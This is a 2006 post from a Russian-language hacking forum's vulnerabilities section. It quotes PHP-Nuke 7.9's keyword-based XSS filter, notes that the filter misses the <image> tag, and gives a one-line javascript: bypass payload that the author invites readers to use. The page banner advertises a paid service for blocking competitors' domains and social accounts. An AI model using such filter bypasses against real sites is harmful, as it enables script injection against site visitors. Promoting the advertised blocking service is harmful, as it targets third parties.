баг в PHP-Nuke 7.9

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
баг в PHP-Nuke 7.9

Опции темы

Поиск в этой теме

Опции просмотра

баг в PHP-Nuke 7.9

23.02.2006, 14:52

Dr0ne

Новичок

Регистрация: 22.02.2006

Сообщений: 12

С нами: 10639733

Репутация: 3

баг в PHP-Nuke 7.9

я просмотрел код нюки на русском на нашел брешь в проверке на XSS

PHP код:


		
			
if (!defined('ADMIN_FILE')) {      foreach ($_GET as $sec_key => $secvalue) {          if ((eregi("<*script*\"?*>", $secvalue)) ||          (eregi("<*object*\"?*>", $secvalue)) ||          (eregi("<*iframe*\"?*>", $secvalue)) ||          (eregi("<*applet*\"?*>", $secvalue)) ||          (eregi("<*meta*\"?*>", $secvalue)) ||          (eregi("<*style*\"?*>", $secvalue)) ||          (eregi("<*form*\"?*>", $secvalue)) ||          (eregi("<*img*\"?*>", $secvalue)) ||          (eregi("<*onmouseover*\"?*>", $secvalue)) ||          (eregi("\(*\"?*\)", $secvalue)) ||          (eregi("\"", $secvalue)) ||          (eregi("forum_admin", $sec_key)) ||          (eregi("inside_mod", $sec_key))) {

тут нет проверки на тэг <image >
атаку можно провести так

Код HTML:

<image src=javascript:alert('ok')>

пользуйтесь. будут вопросы - обращайтесь

𝕏 Twitter Reddit Telegram Копировать ссылку

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41
PHP vs mod_rewrite	Trinux	PHP	11	13.05.2005 21:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules